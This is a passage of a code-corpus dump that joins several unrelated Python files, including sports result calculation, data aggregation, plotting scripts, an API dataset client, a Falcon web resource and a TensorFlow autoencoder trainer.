qual == Qualification.III:\n table = [\n 
(1000, 169),\n (850, 166),\n (750, 163),\n (650, 160),\n (500, 157),\n (425, 154),\n (375, 151),\n (325, 148),\n (250, 145),\n (211, 142),\n (185, 139),\n (159, 136),\n (120, 133),\n (102, 130),\n (90, 127),\n (78, 124),\n (60, 121),\n (51, 118),\n (45, 115),\n (39, 112),\n (30, 109),\n (27, 106),\n (25, 103),\n (23, 100)\n ]\n elif qual == Qualification.I_Y:\n table = [\n (650, 0),\n (500, 192),\n (425, 188),\n (375, 184),\n (325, 180),\n (250, 176),\n (211, 172),\n (185, 168),\n (159, 164),\n (120, 160),\n (102, 156),\n (90, 152),\n (78, 148),\n (60, 144),\n (51, 140),\n (45, 136),\n (39, 132),\n (30, 128),\n (27, 124),\n (25, 120),\n (23, 116),\n (20, 112),\n (17, 108),\n (15, 104),\n (13, 100)\n ]\n elif qual == Qualification.II_Y:\n table = [\n (425, 0),\n (375, 215),\n (325, 210),\n (250, 205),\n (211, 200),\n (185, 195),\n (159, 190),\n (120, 185),\n (102, 180),\n (90, 175),\n (78, 170),\n (60, 165),\n (51, 160),\n (45, 155),\n (39, 150),\n (30, 145),\n (27, 140),\n (25, 135),\n (23, 130),\n (20, 125),\n (17, 120),\n (15, 116),\n (13, 112),\n (11, 108),\n (10, 105),\n (7, 102),\n (5, 100)\n ]\n\n for i in range(len(table)):\n cur_value = table[i][0]\n if cur_value <= rank:\n return table[i][1]\n return 0\n\n def get_time_for_rank(self, leader_time, qual, rank):\n percent = self.get_percent_for_rank(qual, rank)\n assert isinstance(leader_time, OTime)\n msec_new = round(leader_time.to_msec() * percent / 100)\n ret = OTime(msec=msec_new)\n return ret\n\n\ndef get_start_list_data():\n pass\n\n\ndef get_result_data():\n \"\"\"\n\n :return: {\n \"title\": str,\n \"groups\": [\n {\n \"name\": str,\n \"persons\": [\n get_person_result_data\n ...\n ]\n }\n ]\n }\n \"\"\"\n data = []\n for group in race().groups:\n array = ResultCalculation().get_group_finishes(group)\n group_data = {\n 'name': group.name,\n 'persons': []\n }\n for res in array:\n assert isinstance(res, Result)\n person_data = get_person_result_data(res)\n group_data['persons'].append(person_data)\n data.append(group_data)\n ret = {'groups': data, 'title': 'Competition title'}\n\n return ret\n\n\ndef get_splits_data():\n pass\n\n\ndef get_splits_data_printout(person):\n ret = {}\n person_json = {}\n result_json = {}\n legs = []\n\n assert isinstance(person, Person)\n group = person.group\n # course = group.course\n course = find_course(person)\n assert isinstance(course, Course)\n result = person.result\n\n person_json['name'] = person.full_name\n person_json['group'] = person.group.name\n person_json['bib'] = person.bib\n person_json['team'] = person.organization.name\n person_json['sportident_card'] = int(person.sportident_card)\n\n result_json['start'] = time_to_hhmmss(person.start_time)\n result_json['finish'] = time_to_hhmmss(result.get_finish_time())\n result_json['result'] = result.get_result()\n result_json['penalty_time'] = time_to_hhmmss(result.get_penalty_time())\n result_json['status'] = result.status\n result_json['place'] = result.place\n result_json['group_count_all'] = person.group.get_count_all()\n result_json['group_count_finished'] = person.group.get_count_finished()\n\n person_index = 0\n course_index = 0\n course_code = course.controls[course_index].code\n leg_start_time = result.get_start_time()\n start_time = result.get_start_time()\n\n while person_index < len(result.splits):\n cur_split = result.splits[person_index]\n cur_code = cur_split.code\n cur_time = cur_split.time\n\n leg = {}\n leg['code'] = cur_code\n leg['index'] = person_index\n leg['absolute_time'] = time_to_hhmmss(cur_time)\n 
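# relative_time below is measured from the competitor's start; leg_time (set further down for expected controls) is measured from the previous correct punch.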
leg['relative_time'] = time_to_hhmmss(cur_time - start_time)\n\n status = 'correct'\n if course_code == cur_code:\n leg_time = cur_time - leg_start_time\n leg_start_time = cur_time\n\n leg['leg_time'] = time_to_hhmmss(leg_time)\n leg['course_index'] = course_index\n\n leg['leg_speed'] = 'xx m/km' # TODO calculate speed\n leg['leg_place'] = '1' # TODO\n leg['leg_leader'] = 'John Smith' # TODO\n leg['leg_best_time'] = '00:00:21' # TODO\n\n course_index += 1\n if course_index >= len(course.controls):\n course_code = -1\n else:\n course_code = course.controls[course_index].code\n\n else:\n status = 'extra'\n\n leg['status'] = status\n legs.append(leg)\n\n person_index += 1\n\n ret['person'] = person_json\n ret['result'] = result_json\n ret['legs'] = legs\n\n return ret\n\n\ndef get_entry_statistics_data():\n pass\n\n\ndef get_team_statistics_data():\n pass\n\n\ndef get_person_result_data(res):\n person = res.person\n assert isinstance(person, Person)\n ret = {\n 'name': person.full_name,\n 'team': person.organization.name,\n 'qual': person.qual.get_title(),\n 'year': person.year,\n 'penalty_time': time_to_hhmmss(res.get_penalty_time()),\n 'result': res.get_result(),\n 'place': res.place,\n 'assigned_rank': res.assigned_rank.get_title()\n }\n return ret\n","sub_path":"sportorg/models/result/result_calculation.py","file_name":"result_calculation.py","file_ext":"py","file_size_in_byte":14251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347749738","text":"import calendar\nfrom operator import itemgetter\nfp = open('final_data.txt')\nborough_combi = {}\nfor lines in fp:\n\tline = lines.strip().split('\\t')\n\tkey = line[0]\n\ttrips = line[1].strip()\n\tkey = key.replace(\"'\", \"\")\n\tkey = key.replace(\"(\", \"\")\n\tkey = key.replace(\")\", \"\")\n\tkey = key.replace(\",\", \"-\")\n\tif borough_combi.get(key) == None:\n\t\tborough_combi[key] = int(trips)\n\telse:\n\t\tborough_combi[key] += int(trips)\n\nfw = open('final_data.csv', 'w')\nfw.write('Pickup & Dropoff, count of trips')\nfor data in borough_combi.keys():\n\tfw.write('\\n')\n\tfw.write(str(data) + ', '+str(borough_combi[data]))\nfw.close()\n'''\n\tprint(\"%s,%s\" %(key,trips))\n'''","sub_path":"Reduce_Files_Aggregation_Scripts/top_pickup-dropoff_combination/top_pick_drop_combo.py","file_name":"top_pick_drop_combo.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"308406972","text":"from .Error import ErrorUtils\nfrom ..state.CommandState import CommandState\n\nclass CommandUtils:\n def create_command(raw_command_string=None):\n if raw_command_string == None or len(raw_command_string.strip()) == 0:\n return ErrorUtils('COMMAND_STRING_EMPTY', 'Command string cannot be empty.')\n else:\n parsed_command = raw_command_string.split(' ')\n return { 'main_command': parsed_command[0], 'command_arguments': parsed_command[1:] }\n\n def execute_command(command=None):\n main_command = command.get('main_command')\n command_arguments = command.get('command_arguments')\n\n if isinstance(main_command, str) and isinstance(command_arguments, list):\n # check if the command is present in the commands dictionary in the command state\n command = CommandState.get('commands').get(main_command)\n\n if command != None:\n # execute the corresponding command in the commands dictionary\n return command(command_arguments)\n else:\n return ErrorUtils('COMMAND_NOT_FOUND', 'The command {} was not 
found.'.format(main_command))\n        else:\n            return ErrorUtils('INVALID_COMMAND', 'Type a valid command and then press ENTER key. Execute command \\'help\\' to get the list of available commands.')","sub_path":"src/utils/Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483015310","text":"#!/usr/bin/python\n\n'''\nIn Network Simulation project for Caltech CS 143, the following metrics are\nmeasured and then graphed as a time trace and overall average:\n    For each link:\n    -- link rate (Mbps)\n    -- buffer occupancy (is this one per link?)\n    -- packet loss\n    For each flow:\n    -- flow rate\n    -- window size\n    -- packet delay\nThe simulator records data into a .json file, from which data is extracted\nand graphed.\n'''\n\nimport json\nimport sys\nimport matplotlib.pyplot as plt \n\ndef loadAllData(filename):\n\t'''\n\tGiven the .json data file, sorts all data into their appropriate arrays\n\tfor later graphing. If a data point is 'null' it is skipped.\n\t'''\n\twith open(filename) as dataFile:\n\t\t# create array of events\n\t\tevents = json.load(dataFile)[\"Simulation Event Metrics\"]\n\t\n\t# initialize arrays and dicts that hold data\t\n\ttimes = []\n\tlinksData = {}\n\tflowsData = {}\n\n\tif events[0][\"Time\"] == 0:\n\t\t# initialize data storage arrays\n\t\ttimes.append(0)\n\t\t# initialize data storage arrays for links\n\t\tfor link in events[0][\"LinkData\"]:\n\t\t\tlinksData[link[\"LinkID\"]] = {\"Link Rate (Mbps)\" : [link[\"LinkRate\"]],\n\t\t\t            \"Buffer Occupancy (pkts)\" : [link[\"BuffOcc\"]],\n\t\t\t            \"Packet Loss (pkts)\" : [link[\"PktLoss\"]]}\n\t\tfor flow in events[0][\"FlowData\"]:\n\t\t\tflowsData[flow[\"FlowID\"]] = {\"Flow Rate (Mbps)\" : [flow[\"FlowRate\"]],\n\t\t\t\t    \"Window Size (pkts)\" : [flow[\"WinSize\"]],\n\t\t\t\t    \"Packet Delay (ms)\" : [flow[\"PktDelay\"]]}\n\n\t# continue sorting data from every event\n\tfor event in events[1:]:\n\t\t# get time\n\t\ttimes.append(event[\"Time\"])\n\t\t# get and store link data\n\t\tfor link in event[\"LinkData\"]:\n\t\t\tlinksData[link[\"LinkID\"]][\"Link Rate (Mbps)\"].append(link[\"LinkRate\"])\n\t\t\tlinksData[link[\"LinkID\"]][\"Buffer Occupancy (pkts)\"].append(link[\"BuffOcc\"])\n\t\t\tlinksData[link[\"LinkID\"]][\"Packet Loss (pkts)\"].append(link[\"PktLoss\"])\n\t\t\t\n\t\t# get and store flow data\n\t\tfor flow in event[\"FlowData\"]:\n\t\t\tflowsData[flow[\"FlowID\"]][\"Flow Rate (Mbps)\"].append(flow[\"FlowRate\"])\n\t\t\tflowsData[flow[\"FlowID\"]][\"Window Size (pkts)\"].append(flow[\"WinSize\"])\n\t\t\tflowsData[flow[\"FlowID\"]][\"Packet Delay (ms)\"].append(flow[\"PktDelay\"])\n\n\treturn (times, linksData, flowsData)\n\n\ndef plotLinkData(time, linksData):\n\t'''\n\tGiven array of time data and dictionary containing metrics for all links,\n\tgenerate three plots: one showing each metric for all links.\n\t'''\n\n\tf, (lrates, buffocc, pktloss) = plt.subplots(3, 1, sharex=True)\n\n\t# set window title\n\tf.canvas.set_window_title(\"Link Metrics Graph\")\n\t\n\t# plot link rates, buff occup, packet loss for all links\n\t# note: 'o' is to ensure scatterplot\n\tfor link in linksData.keys():\n\t\tlrates.plot(time, linksData[link][\"Link Rate (Mbps)\"], 'o', label=str(link))\n\t\tbuffocc.plot(time, linksData[link][\"Buffer Occupancy (pkts)\"], 'o', label=str(link))\n\t\tpktloss.plot(time, linksData[link][\"Packet Loss (pkts)\"], 'o', label=str(link))\n\t\n\t# add titles and labels and legend to 
plots\n\tlrates.set_xlabel('Time (ms)')\n\tlrates.set_ylabel('Link Rate (Mbps)')\n\tlrates.legend()\n\t\n\tbuffocc.set_xlabel('Time (ms)')\n\tbuffocc.set_ylabel('Buffer Occupancy (pkts)')\n\tbuffocc.legend()\n\t\n\tpktloss.set_xlabel('Time (ms)')\n\tpktloss.set_ylabel('Packet Loss (pkts)')\n\tpktloss.legend()\n\n\t# set window title\n\tf.canvas.set_window_title(\"Link Metrics Graph\")\n\n\ndef plotFlowData(time, flowsData):\n\t'''\n\tGiven array of time data and dictionary containing metrics for all flows,\n\tgenerate three plots: one showing each metric for all flows.\n\t'''\n\tf, (frates, winsize, pktdelay) = plt.subplots(3, 1, sharex=True)\n\t\n\t# plot flow rates, window size, packet delay for all flows\n\t# note: 'o' is to ensure scatterplot\n\tfor flow in flowsData.keys():\n\t\tfrates.plot(time, flowsData[flow][\"Flow Rate (Mbps)\"], 'o',label=str(flow))\n\t\twinsize.plot(time, flowsData[flow][\"Window Size (pkts)\"], 'o', label=str(flow))\n\t\tpktdelay.plot(time, flowsData[flow][\"Packet Delay (ms)\"], 'o', label=str(flow))\n\t\n\t# add titles and labels to plots\n\tfrates.set_xlabel('Time (ms)')\n\tfrates.set_ylabel('Flow Rate (Mbps)')\n\tfrates.legend()\n\t\n\twinsize.set_xlabel('Time (ms)')\n\twinsize.set_ylabel('Window Size (pkts)')\n\twinsize.legend()\n\t\n\tpktdelay.set_xlabel('Time (ms)')\n\tpktdelay.set_ylabel('Packet Delay (ms)')\n\tpktdelay.legend()\n\n\t# set window title\n\t# don't really understand why this isn't working\n\tf.canvas.set_window_title(\"Flow Metrics Graph\")\n\ndef plotAll(time, linksData, flowsData):\n\t''' Generates plots for flow and link data'''\n\t# plot links\n\tplotLinkData(time, linksData)\n\t# plot flows\n\tplotFlowData(time, flowsData)\n\n\tplt.show()\n\nif __name__ =='__main__':\n\ttry:\n\t\tfilename = sys.argv[1]\n\t\t\n\t\t# make sure it's a json file\n\t\tif filename.split('.')[1] != \"json\":\n\t\t\traise IOError()\n\t\t\n\t\ttime, links, flows = loadAllData(filename)\n\t\tplotAll(time, links, flows)\n\t\n\texcept IndexError:\n\t\tprint >> sys.stderr, \"usage: python plotNetSimGraphs *.json\"\n\t\tsys.exit(1)\n\n\texcept IOError:\n\t\tprint >> sys.stderr, \"usage: python plotNetSimGraphs *.json\"\n\t\tprint >> sys.stderr, \"       input must be valid *.json file format\"\n\t\tsys.exit(1)","sub_path":"plot/plotNetSimData.py","file_name":"plotNetSimData.py","file_ext":"py","file_size_in_byte":5103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175620431","text":"from typing import List\nimport datetime as dt\n\nimport pandas as pd\nfrom tqdm import tqdm\nfrom halo import Halo\n\nimport leveropen.client\nfrom leveropen.l_series import LSeries\nfrom leveropen.utils import parse_categories\n\n\nclass Dataset:\n    \"\"\"\n    Represents a Lever Open dataset\n\n    :param uuid: Unique ID of the dataset\n    :type uuid: str\n    :param name: Name of the dataset\n    :type name: str\n    :param released_on: Most recent release date of the data\n    :type released_on: datetime.datetime\n    :param processed_on: Most recent date that Lever Open processed the data\n    :type processed_on: datetime.datetime\n    :param collection: Collection to which the dataset belongs\n    :type collection: str\n    :param topic: Topic to which the dataset belongs\n    :type topic: str\n    :param link: URL\n    :type link: str\n    :param license: {'name': 'License name', 'url': 'link-to-license'}\n    :type license: dict\n    :param datetimes: e.g. ``[{'name': 'Month', 'range': ['January 1997', 'December 2020']}, ...]``\n    :type datetimes: List[dict]\n    :param locations: e.g. 
``[{'type': 'Country', 'name', 'UK'}, ...]``\n :type locations: List[dict]\n :param categories: e.g. ``[{'type': 'Sector', 'name': 'Construction'}, ...]``\n :type categories: List[dict]\n :param series_url: URL link to series data\n :type series_url: str\n :param client: Lever Open API Client\n :type client: :func:`leveropen.client.Client`\n\n \"\"\"\n\n def __init__(\n self,\n uuid: str,\n name: str,\n released_on: dt.datetime,\n processed_on: dt.datetime,\n collection: str,\n topic: str,\n link: str,\n license: dict,\n datetimes: List[dict],\n locations: List[dict],\n categories: List[dict],\n series_url: str,\n client: leveropen.client.Client,\n ):\n self.uuid = uuid\n self.name = name\n self.released_on = released_on\n self.processed_on = processed_on\n self.collection = collection\n self.topic = topic\n self.link = link\n self.license = license\n self.datetimes = datetimes\n self.locations = locations\n self.categories = categories\n self.series_url = series_url\n self.series = None\n self.series_objects = None\n self.client = client\n\n def __repr__(self):\n return f\"\"\"\n {self.__class__.__name__}(\n uuid={repr(self.uuid)},\n name={repr(self.name)},\n released_on={repr(self.released_on)},\n processed_on={repr(self.processed_on)},\n collection={repr(self.collection)},\n topic={repr(self.topic)},\n link={repr(self.link)},\n license={repr(self.license)},\n datetimes={repr(self.datetimes)},\n locations={repr(self.locations)},\n categories={repr(self.categories)},\n series_url={repr(self.series_url)}\n )\"\"\"\n\n def __eq__(self, other):\n criteria = (\n (isinstance(other, Dataset))\n and (self.uuid == other.uuid)\n and (self.name == other.name)\n and (self.released_on == other.released_on)\n and (self.processed_on == other.processed_on)\n and (self.collection == other.collection)\n and (self.topic == other.topic)\n and (self.link == other.link)\n and (self.license == other.license)\n and (self.datetimes == other.datetimes)\n and (self.locations == other.locations)\n and (self.categories == other.categories)\n and (self.series_url == other.series_url)\n )\n return criteria\n\n def get_metadata(self) -> pd.Series:\n \"\"\"\n\n :return: Key information about the dataset\n :rtype: pandas.Series\n\n :example:\n\n .. code-block:: python\n\n >>> metadata = self.get_metadata()\n >>> metadata.head()\n name Example Dataset\n topic Economy\n collection Gross Domestic Product (GDP)\n released_on 2021-02-12 00:00:00\n processed_on 2021-03-05 00:00:00\n Name: example-dataset-uuid, dtype: object\n\n \"\"\"\n return pd.Series(\n data={\n \"name\": self.name,\n \"topic\": self.topic,\n \"collection\": self.collection,\n \"released_on\": self.released_on,\n \"processed_on\": self.processed_on,\n \"link\": self.link,\n \"license_name\": self.license[\"name\"],\n \"license_url\": self.license[\"url\"],\n \"series_names_and_uuids\": self.get_series_names_and_uuids(),\n \"categories\": self.get_categories(),\n },\n name=self.uuid,\n )\n\n def get_categories(self) -> pd.DataFrame:\n \"\"\"\n\n :return: Type and Categories\n :rtype: pandas.DataFrame\n\n :example:\n\n .. 
code-block:: python\n\n >>> self.get_categories()\n type name\n 0 Sector Construction\n 1 Sector Services\n 2 Adjustment Seasonally adjusted\n 3 Sector Production\n 4 Total Monthly GDP\n 5 Sector Agriculture\n\n \"\"\"\n return parse_categories(categories=self.categories)\n\n def get_series(self, load: bool = True) -> List[LSeries]:\n \"\"\"\n\n :param load: if ``'True'`` then self.series_objects is set\n :return: all series names on the dataset\n :rtype: List[LSeries]\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series()\n [\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n ),\n LSeries(\n uuid='uuid-of-series-two',\n name='Series-Name-Two',\n units='Count',\n magnitude=1,\n ...\n )\n ]\n\n \"\"\"\n series = self.series or self._get_series_by_url()\n parsed_series = self._parse_series(series)\n if load:\n self.series_objects = parsed_series\n return parsed_series\n\n def get_series_names_and_uuids(self) -> pd.DataFrame:\n \"\"\"\n\n :return: all series name and their uuid\n :rtype: pandas.DataFrame\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_names_and_uuids()\n name uuid\n 0 Series-Name-One uuid-of-series-one\n 1 Series-Name-Two uuid-of-series-Two\n 2 ... ...\n n Series-Name-N uuid-of-series-N\n\n \"\"\"\n series = self.series_objects or self.get_series()\n return pd.DataFrame(\n data={\n \"name\": [s.name for s in series],\n \"uuid\": [s.uuid for s in series],\n }\n )\n\n def get_series_by_name(self, name: str) -> LSeries:\n \"\"\"\n\n :param name: the name of the series :attr:`leveropen.l_series.LSeries.name`\n :return: LSeries\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_by_name(name='Series-Name-One')\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n )\n\n \"\"\"\n series = [s for s in self.get_series() if s.name == name]\n if not series:\n raise ValueError(\n f\"The dataset '{self.name}' has no series matching the name '{name}'\"\n )\n if len(series) == 1:\n return series[0]\n else:\n raise ValueError(\n f\"More than one series has the name '{name}'. \"\n f\"Try using the method get_series_by_name_containing\"\n )\n\n def get_series_by_uuid(self, uuid: str) -> LSeries:\n \"\"\"\n\n :param uuid: the uuid of the series :attr:`leveropen.l_series.LSeries.uuid`\n :return: LSeries\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_by_uuid(uuid='uuid-of-series-one')\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n )\n\n \"\"\"\n series = [s for s in self.get_series() if s.uuid == uuid]\n if not series:\n raise ValueError(\n f\"The dataset '{self.uuid}' has no series matching the name '{uuid}'\"\n )\n if len(series) == 1:\n return series[0]\n else:\n raise ValueError(f\"More than one series has the uuid '{uuid}'\")\n\n def get_series_by_name_containing(\n self, name_containing_string: str\n ) -> List[LSeries]:\n \"\"\"\n\n :param name_containing_string: substring for which to find in series names\n :type name_containing_string: str\n :return: list of Lever Open Series\n :rtype: List[LSeries]\n\n :example:\n\n .. code-block:: python\n\n >>> self.get_series_by_name_containing(\n ... name_containing_string='Series-Name'\n ... 
)\n [\n LSeries(\n uuid='uuid-of-series-one',\n name='Series-Name-One',\n units='Count',\n magnitude=1,\n ...\n ),\n LSeries(\n uuid='uuid-of-series-two',\n name='Series-Name-Two',\n units='Count',\n magnitude=1,\n ...\n )\n ]\n\n \"\"\"\n series = [\n s for s in self.get_series() if s.name.find(name_containing_string) != -1\n ]\n if not series:\n raise ValueError(\n f\"The dataset {self.name} has no series names containing '{name_containing_string}'\"\n )\n return series\n\n def _get_series_by_url(self, load=True):\n url = self.series_url\n url = url.replace(self.client.host_url, \"\")\n next_page = True\n page = 1\n spinner = Halo(text=\"Requesting series data\", spinner=\"dots\")\n spinner.start()\n all_data_series = []\n while next_page:\n spinner.text = f\"Requesting series data: page={page}\"\n content = self.client.get(url, params={\"page\": page}, verbose=False).json()\n next_link = content[\"links\"][\"next\"]\n data_series = content[\"data\"][\"series\"]\n all_data_series = all_data_series + data_series\n if not next_link:\n next_page = False\n else:\n page += 1\n if not all_data_series:\n spinner.fail(\"Loading series data failed\")\n raise ValueError(f\"Loading series data failed\")\n else:\n spinner.succeed(\"Loading series data successful\")\n if load:\n self.series = all_data_series\n return all_data_series\n\n def _parse_series(self, series: list):\n series_objects = []\n for s in tqdm(series, desc=\"Parsing series\", unit=\"series\"):\n series_objects.append(\n LSeries(\n uuid=s.get(\"uuid\"),\n name=s.get(\"name\"),\n units=s.get(\"units\"),\n magnitude=s.get(\"magnitude\"),\n link=s.get(\"link\"),\n date_time=s.get(\"datetime\"),\n location=s.get(\"location\"),\n categories=s.get(\"categories\"),\n client=self.client,\n )\n )\n return series_objects\n","sub_path":"leveropen/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"404574362","text":"import json\nimport falcon\nfrom ebl.require_scope import require_scope\nfrom ebl.fragmentarium.transliterations import Transliteration\n\n\nclass FragmentsResource:\n def __init__(self, fragmentarium):\n self._fragmentarium = fragmentarium\n\n @falcon.before(require_scope, 'read:fragments')\n def on_get(self, req, resp, number):\n user = req.context['user']\n try:\n resp.media = (self\n ._fragmentarium\n .find(number)\n .to_dict_for(user))\n except KeyError:\n resp.status = falcon.HTTP_NOT_FOUND\n\n @falcon.before(require_scope, 'transliterate:fragments')\n def on_post(self, req, resp, number):\n def parse_request():\n body = json.loads(req.stream.read())\n try:\n return Transliteration(\n body['transliteration'],\n body['notes']\n )\n except (TypeError, KeyError):\n raise falcon.HTTPUnprocessableEntity()\n\n try:\n self._fragmentarium.update_transliteration(\n number,\n parse_request(),\n req.context['user']\n )\n except KeyError:\n resp.status = falcon.HTTP_NOT_FOUND\n","sub_path":"ebl/fragmentarium/fragments.py","file_name":"fragments.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626645802","text":"#!/usr/bin/python3\n\nimport argparse\nfrom matplotlib import pyplot as plt\nfrom scipy.stats.stats import linregress\n\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth'] = 1.5\nmatplotlib.rcParams['axes.linewidth'] = 1.5\nmatplotlib.rcParams['axes.labelsize'] = 
16\nmatplotlib.rcParams['axes.color_cycle'] = list('crgmybk')\nmatplotlib.rcParams['font.size'] = 10\nmarkers = ('o', 'v', '^', '<', '>', 's', '8', 'p')\n\n\ndef convert(line, target='float'):\n    if target == 'float':\n        return [float(i) for i in line]\n    elif target == 'int':\n        return [int(i) for i in line]\n    elif target == 'str':\n        return [str(i) for i in line]\n\n\ndef get_data(data_file):\n    \"\"\"\n    Hypothesis: there is no SD bar for the x axis.\n    \"\"\"\n    clean_data = list()\n    with open(data_file, 'r') as raw:\n        for line in raw.readlines():\n            if line.startswith('#'):\n                continue\n            line = line.strip()\n            line = line.split(sep=arg.split)\n            if len(line) < 2:\n                continue\n            clean_data.append(line)\n\n    axis_unit = dict()\n    y = dict()\n    for n, line in enumerate(clean_data):\n        label = line[0]\n        unit = line[1]\n        value = convert(line[2:])\n        if len(value) == 0:\n            continue\n        if label.startswith('x_value'):\n            axis_unit['x'] = unit\n            x = convert(value)\n            continue\n        elif label.startswith('#'):\n            continue\n        else:\n            axis_unit['y'] = unit\n        last_line = clean_data[n-1]\n        if label == last_line[0]:\n            y[last_line[0]] = [convert(last_line[2:]), convert(value)]\n        else:\n            y[label] = [convert(value), list()]\n    return axis_unit, x, y\n\n\ndef draw_fit(x, y):\n    range = arg.regression\n    x = x[:range]\n    y = y[:range]\n    slope, intercept, r_value, *_ = linregress(x, y)\n    text = r'$f(x)={0:.3f}x+{1:.3f}, R^2={2:.3f}$'.format(\n        slope, intercept, r_value**2)\n    fit = [slope*i+intercept for i in x]\n    plt.plot(x[:arg.regression], fit, 'k--')\n    plt.annotate(text, xy=(x[-1], y[-2]))\n\n\ndef main():\n    \"\"\"\n    The input file should look like this:\n    x_value unit 1 2 3\n    ylabel unit 23 3 5\n    y_sd unit 3 3 3\n    Lines starting with # will be ignored.\n    \"\"\"\n    parser = argparse.ArgumentParser(description=main.__doc__)\n    parser.add_argument('--path', default='./',\n                        help='target path, default is \"./\"')\n    parser.add_argument('data', default='a.txt')\n    parser.add_argument('-s', '--split', default=' ', type=str)\n    parser.add_argument('-o', '--output', default='output')\n    parser.add_argument('-r', '--regression', type=int, default=0)\n    global arg\n    arg = parser.parse_args()\n    data = get_data(arg.data)\n    unit, x, y = data\n    plt.xlabel(unit['x'])\n    plt.ylabel(unit['y'])\n    # line format\n    fmt = '-'\n    for i, marker in zip(y.keys(), markers):\n        if len(y[i][1]) == 0:\n            y[i][1] = [0] * len(y[i][0])\n        plt.errorbar(x, y[i][0], fmt=fmt+marker, markeredgecolor='none',\n                     yerr=y[i][1], ecolor='k', label=i)\n        if arg.regression != 0:\n            draw_fit(x, y[i][0])\n    if len(y) > 1:\n        plt.legend(loc='best')\n    plt.savefig(arg.output+'.png')\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"plot/dot.py","file_name":"dot.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"533815329","text":"import numpy as np\nfrom global_module.implementation_module import Autoencoder\nfrom global_module.implementation_module import Reader\nimport tensorflow as tf\nfrom global_module.settings_module import ParamsClass, Directory, Dictionary\nimport random\nimport sys\nimport time\n\n\nclass Train:\n    def __init__(self):\n        self.iter_train = 0\n        self.iter_valid = 0\n\n    def run_epoch(self, session, min_loss, model_obj, reader, input, writer):\n        global epoch_combined_loss, step\n        epoch_combined_loss = 0.0\n\n        params = model_obj.params\n        dir_obj = model_obj.dir_obj\n        for step, curr_input in enumerate(reader.data_iterator(input)):\n            feed_dict = {model_obj.input: 
curr_input}\n if params.mode == 'TR':\n run_metadata = tf.RunMetadata()\n inp, op, total_loss, summary_train, _ = session.run([model_obj.input, model_obj.decoded_op, model_obj.loss, model_obj.merged_summary_train, model_obj.train_op],\n run_metadata=run_metadata,\n feed_dict=feed_dict)\n self.iter_train += 1\n if self.iter_train % params.log_step == 0 and params.log:\n writer.add_run_metadata(run_metadata, 'step%d' % self.iter_train)\n writer.add_summary(summary_train, self.iter_train)\n\n elif params.mode == 'VA':\n total_loss, summary_valid = session.run([model_obj.loss, model_obj.merged_summary_valid],\n feed_dict=feed_dict)\n self.iter_valid += 1\n if self.iter_valid % params.log_step == 0 and params.log:\n writer.add_summary(summary_valid, self.iter_valid)\n\n else:\n total_loss = session.run(model_obj.loss, feed_dict=feed_dict)\n\n epoch_combined_loss += total_loss\n\n epoch_combined_loss /= step\n if params.mode == 'VA':\n model_saver = tf.train.Saver()\n print('**** Current minimum on valid set: %.4f ****' % min_loss)\n\n if epoch_combined_loss < min_loss:\n min_loss = epoch_combined_loss\n model_saver.save(session,\n save_path=dir_obj.model_path + dir_obj.model_name,\n latest_filename=dir_obj.latest_checkpoint)\n print('==== Model saved! ====')\n\n return epoch_combined_loss, min_loss\n\n def run_train(self):\n global train_writer, valid_writer\n mode_train, mode_valid = 'TR', 'VA'\n\n # train object\n params_train = ParamsClass(mode=mode_train)\n dir_train = Directory(mode_train)\n train_reader = Reader(params_train)\n train_instances = train_reader.read_image_data(dir_train.data_filename)\n\n # valid object\n params_valid = ParamsClass(mode=mode_valid)\n dir_valid = Directory(mode_valid)\n valid_reader = Reader(params_valid)\n if dir_valid.data_filename is None:\n all_instances = train_instances\n train_instances = all_instances[: int(0.8 * len(all_instances))]\n valid_instances = all_instances[int(0.8 * len(all_instances)):]\n else:\n valid_instances = valid_reader.read_image_data(dir_valid.data_filename)\n\n random.seed(4321)\n if (params_train.enable_shuffle):\n random.shuffle(train_instances)\n random.shuffle(valid_instances)\n\n global_min_loss = sys.float_info.max\n\n print('***** INITIALIZING TF GRAPH *****')\n\n with tf.Graph().as_default(), tf.Session() as session:\n # random_normal_initializer = tf.random_normal_initializer()\n # random_uniform_initializer = tf.random_uniform_initializer(-params_train.init_scale, params_train.init_scale)\n xavier_initializer = tf.contrib.layers.xavier_initializer(uniform=True, seed=None, dtype=tf.float32)\n\n # with tf.name_scope('train'):\n with tf.variable_scope(\"model\", reuse=None, initializer=xavier_initializer):\n train_obj = Autoencoder(params_train, dir_train)\n\n # with tf.name_scope('valid'):\n with tf.variable_scope(\"model\", reuse=True, initializer=xavier_initializer):\n valid_obj = Autoencoder(params_valid, dir_valid)\n\n if not params_train.enable_checkpoint:\n session.run(tf.global_variables_initializer())\n\n if params_train.enable_checkpoint:\n ckpt = tf.train.get_checkpoint_state(dir_train.model_path)\n if ckpt and ckpt.model_checkpoint_path:\n print(\"Loading model from: %s\" % ckpt.model_checkpoint_path)\n tf.train.Saver().restore(session, ckpt.model_checkpoint_path)\n\n print('**** TF GRAPH INITIALIZED ****')\n\n if params_train.log:\n train_writer = 